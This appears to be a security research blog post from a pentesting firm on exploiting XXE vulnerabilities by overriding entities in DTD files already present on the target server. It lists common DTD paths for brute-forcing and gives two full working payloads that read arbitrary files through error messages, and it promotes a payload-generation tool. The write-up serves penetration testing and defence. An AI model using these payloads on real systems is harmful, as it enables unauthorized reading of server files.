Last month, we presented at Hack In Paris (France) a XML External Entities (XXE) exploitation workshop. It showcase methods to exploit XXE with numerous obstacles. Today, we present our method to exploit XXEs with a local Document Type Declaration (DTD) file. More specifically, how we built a huge list of reusable DTD files.

XML External Entities (XXE) is a type of attack done against an application that parses XML input. It occurs when XML input containing a reference to an external entity (SYSTEM entity) is processed by a weakly configured XML parser. Over the years, researchers have found multiple ways to exfiltrate content using various XML payloads:

We can notice a trend: Most techniques discovered require the use of a secondary Document Type Declaration file (DTD or DOCTYPE). The DTD files used for these attacks have to be hosted on an HTTP server. Outgoing requests may not be possible in a strict network environment. However, Arseniy Sharoglazov’s technique circumvents this requirement by using existing DTD files on the attacked server.

  

Building a list of DTD

The original research by Arseniy Sharoglazov already listed a few payload variations. It was more than enough to understand the patterns and build additional payloads. In our pentests, we have encountered at least two applications for which the known DTD files were not present on the vulnerable system.

We could not have created a crawler which browses the remote filesystem. File enumeration when pointing a SYSTEM entity to a directory is possible only when the XML parsed is reflected. However, we found a solution. We built a small list of DTD files present on common Linux distributions [Distro1] [Distro2] and tested to see if those files were presented by brute force. The initial DTD list was as follow:

./properties/schemas/j2ee/XMLSchema.dtd
./../properties/schemas/j2ee/XMLSchema.dtd
./../../properties/schemas/j2ee/XMLSchema.dtd
/usr/share/java/jsp-api-2.2.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/java/jsp-api-2.3.jar!/javax/servlet/jsp/resources/jspxml.dtd
/root/usr/share/doc/rh-python34-python-docutils-0.12/docs/ref/docutils.dtd
/root/usr/share/doc/rh-python35-python-docutils-0.12/docs/ref/docutils.dtd
/usr/share/doc/python2-docutils/docs/ref/docutils.dtd
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/xml/fontconfig/fonts.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd
/usr/share/boostbook/dtd/1.1/boostbook.dtd
/usr/share/boostbook/dtd/boostbook.dtd
/usr/share/dblatex/schema/dblatex-config.dtd
/usr/share/struts/struts-config_1_0.dtd
/opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd

 
These DTDs were taken from a search on the Ubuntu and CentOS repositories, and Google searches. When we confirm the presence of a given file, we could download the DTD to build a valid payload.

Here is a demonstration of using pre-built DTD list:

 

   

Automation

When trying to confirm a Web vulnerability, one wants to avoid manual work. For this reason, we wanted to increase the DTD list and avoid the review process of DTD files. To increase the list, we need to sample various OSs to obtain DTD files that are installed commonly on servers. To avoid inspection of DTD files, we had to generate XXE payloads automatically.
  

Obtaining as many DTDs as possible

First, we picked samples from a couple of Linux distributions to which we had access: Ubuntu, CentOS and Arch Linux. We realized DTD are not only in the official packages from the Linux distributions but also in the packages from different languages Ruby, Python, NPM, etc.

Our second target was Docker containers used to host the following Java applications, Tomcat, Weblogic, JBoss,  JDK only and few others. The container with only OpenJDK includes very few DTDs and none with a reusable entity. The Web container built-in files, however, includes a couples DTDs.
  

Entity Injection patterns

Now that we have a list of DTDs. We enumerate the entities that can be overridden. For each of those, we look at their usage and correlates the appropriate injection patterns. Here are two injection patterns:
  

ELEMENT injection

fonts.dtd:
<!ENTITY % expr 'int|double|string|matrix|bool|charset|langset
      |name|const
      |or|and|eq|not_eq|less|less_eq|more|more_eq|contains|not_contains
      |plus|minus|times|divide|not|if|floor|ceil|round|trunc'>
[...]
<!ELEMENT test (%expr;)*>
Associated XXE payload (The entity %expr is overridden):
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message></message>

  

ATTLIST injection

mbeans-descriptors.dtd:
<!ENTITY % Boolean "(true|false|yes|no)">
[...]
<!ATTLIST attribute is %Boolean; #IMPLIED>
<!ATTLIST attribute readable %Boolean; #IMPLIED>
<!ATTLIST attribute writeable %Boolean; #IMPLIED>

  
Associated XXE payload (The entity %Boolean is overridden):

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd">

    <!ENTITY % Boolean '(aa) #IMPLIED>
        <!ENTITY &#x25; file SYSTEM "file:///FILE_TO_READ">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ATTLIST attxx aa "bb"'>

    %local_dtd;
]>

<message></message>

  
As can be seen, different contexts mean different payloads needs to be used. Looking at our sample DTDs, we identified 5 different contexts [C1] [C2] [C3] [C4] [C5]. Those 5 patterns will be used to automate the construction of payloads for new DTD files. We test each pattern with an XML parser to validate that the entity is overridden successfully. These tests with an XML parser allows us to generate working payloads.

   

Putting the pieces together

To summarize, here are the high-level steps taken by our tool, DTD finder.

  1. Find DTD files or DTD files inside .jar or other zip files.
  2. Enumerate the entities declared.
  3. Test each of the entities with common injection patterns.
  4. Report the result summary to the console and the working payloads to a markdown file.

Here is a demonstration of DTD enumeration on a Docker filesystem export.

   
   

Conclusion

The use of a local DTD file to exploit XXEs will become a common practice for Web pentesters. Being efficient at finding common DTD files should make the task easier. Having generated payloads will also make the attack accessible to the testers with limited knowledge of XML.

In order to reproduce the demonstration above, you can pick up the DTD Finder tool on GoSecure’s GitHub. The tool can be used to generate a list for specific systems. You don’t need to run the tool to obtain XXE payloads. We have already generated a list of valid XXE payloads with over 50 DTDs.

   

References

GoSecure Titan® Managed Extended Detection & Response (MXDR)​

GoSecure Titan® Managed Extended Detection & Response (MXDR)​ Foundation

GoSecure Titan® Vulnerability Management as a Service (VMaaS)

GoSecure Titan® Managed Security Information & Event Monitoring (Managed SIEM)

GoSecure Titan® Managed Perimeter Defense​ (MPD)

GoSecure Titan® Inbox Detection and Response (IDR)

GoSecure Titan® Secure Email Gateway (SEG)

GoSecure Titan® Threat Modeler

GoSecure Titan® Identity

GoSecure Titan® Platform

GoSecure Professional Security Services

Incident Response Services

Security Maturity Assessment

Privacy Services

PCI DSS Services

Penetration Testing Services​

Security Operations

MicrosoftLogo

GoSecure MXDR for Microsoft

Comprehensive visibility and response within your Microsoft security environment

USE CASES

Cyber Risks

Risk-Based Security Measures

Sensitive Data Security

Safeguard sensitive information

Private Equity Firms

Make informed decisions

Cybersecurity Compliance

Fulfill regulatory obligations

Cyber Insurance

A valuable risk management strategy

Ransomware

Combat ransomware with innovative security

Zero-Day Attacks

Halt zero-day exploits with advanced protection

Consolidate, Evolve & Thrive

Get ahead and win the race with the GoSecure Titan® Platform

24/7 MXDR FOUNDATION

GoSecure Titan® Endpoint Detection and Response (EDR)

GoSecure Titan® Next Generation Antivirus (NGAV)

GoSecure Titan® Security Information & Event Monitoring (SIEM)

GoSecure Titan® Inbox Detection and Reponse (IDR)

GoSecure Titan® Intelligence

OUR SOC

Proactive Defense, 24/7

ABOUT GOSECURE

GoSecure is a recognized cybersecurity leader and innovator, pioneering the integration of endpoint, network, and email threat detection into a single Managed Extended Detection and Response (MXDR) service. For over 20 years, GoSecure has been helping customers better understand their security gaps and improve their organizational risk and security maturity through MXDR and Professional Services solutions delivered by one of the most trusted and skilled teams in the industry.

EVENT CALENDAR

LATEST PRESS RELEASE

GOSECURE BLOG

SECURITY ADVISORIES

 24/7 Emergency – (888)-287-5858